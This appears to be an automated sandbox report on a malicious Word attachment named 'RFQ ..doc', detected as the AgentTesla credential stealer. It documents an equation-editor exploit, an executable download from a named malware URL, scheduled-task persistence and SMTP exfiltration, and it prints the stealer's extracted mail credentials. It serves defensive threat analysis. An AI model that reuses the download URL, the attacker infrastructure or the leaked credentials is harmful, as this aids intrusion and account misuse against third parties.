
Analysis Report RFQ ..doc

Overview

General Information

Sample Name: RFQ ..doc
Analysis ID: 385437
MD5: 8648267830a23e39c5bc162f4ad72f85
SHA1: 6a0436200203698fbb93170bb93ddc794d5f968e
SHA256: a1b7cd862762ff80cf95b544e80dfc6f887d9e0e9a8fffeec7c2574812b917d6
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1084 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2488 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • rghbyjuyktyjrthbgvfsfhytrrgfsd.exe (PID: 2492 cmdline: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe MD5: F5F1E2A3E5DCE186EED0352350911887)
      • schtasks.exe (PID: 2692 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • EQNEDT32.EXE (PID: 3024 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "efiz@glimpse-it.co@Mexico1.,mail.privateemail.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author
7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.3aede88.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 203.167.7.88, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2488, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2488, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe
Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, ParentImage: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, ParentProcessId: 2492, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp', ProcessId: 2692

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "efiz@glimpse-it.co@Mexico1.,mail.privateemail.com"}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: global traffic | DNS query: name: rotronics.com.ph
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Mon, 12 Apr 2021 12:22:58 GMT; Server: Apache; Last-Modified: Mon, 12 Apr 2021 05:14:50 GMT; Accept-Ranges: bytes; Content-Length: 733184; Vary: User-Agent; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload; Data Raw: [hex dump of the response body omitted]
Source: Joe Sandbox View | IP Address: 198.54.122.60 198.54.122.60
Source: Joe Sandbox View | ASN Name: IWEB-ASCA IWEB-ASCA
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Source: global traffic | HTTP traffic detected: GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: rotronics.com.ph; Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73207C3D-FA20-48C4-87C4-17800DB89026}.tmp
Source: global traffic | HTTP traffic detected: GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: rotronics.com.ph; Connection: Keep-Alive
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: rotronics.com.ph
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350816750.0000000002C06000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350857695.0000000002C4E000.00000004.00000001.sdmp | String found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.org
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp | String found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.orgDL
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | String found in binary or memory: http://ZAGYny.com
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://crl.lt/root-c/cacrl.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000003.2190303371.00000000062C6000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347867617.00000000007EE000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp | String found in binary or memory: http://mail.privateemail.com
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097214520.000000000287D000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354978003.0000000008720000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.acabogacia.org/doc0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.acabogacia.org0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.ancert.com/cps0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp | String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.dnie.es/dpc0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-me.lv/repository0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp | String found in binary or memory: http://www.sk.ee/cps/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp | String found in binary or memory: https://www.netlock.net/docs
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large array initializations
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, <PrivateImplementationDetails>{022117B2-3EA8-40F0-B266-89CB8F70EABC}/91D3F524-3C30-4A8A-B058-9A8C003E6B70.cs | Large array initialization: .cctor: array initializer size 11933
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Code function: 4_2_00D54060 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe | Code function: 4_2_00D54059 NtQueryInformationProcess,
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0040568C
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00402296
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D5338
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D6350
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D5680
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_002D208F
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045B0C8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045AB48
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00453968
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045CB18
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00456DF8
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00451798
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00456A70
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00459EE0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_00455BE0
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeCode function: 7_2_0045D3E0
                  Source: ZhIOjFmINIXbKXm[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: cAFIUeWyVQPJe.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@9/2
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$RFQ ..docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeMutant created: \Sessions\1\BaseNamedObjects\uUxkFOSqwAhvdfFtRYTsdWC
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC8DA.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............(................j......................................................................
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
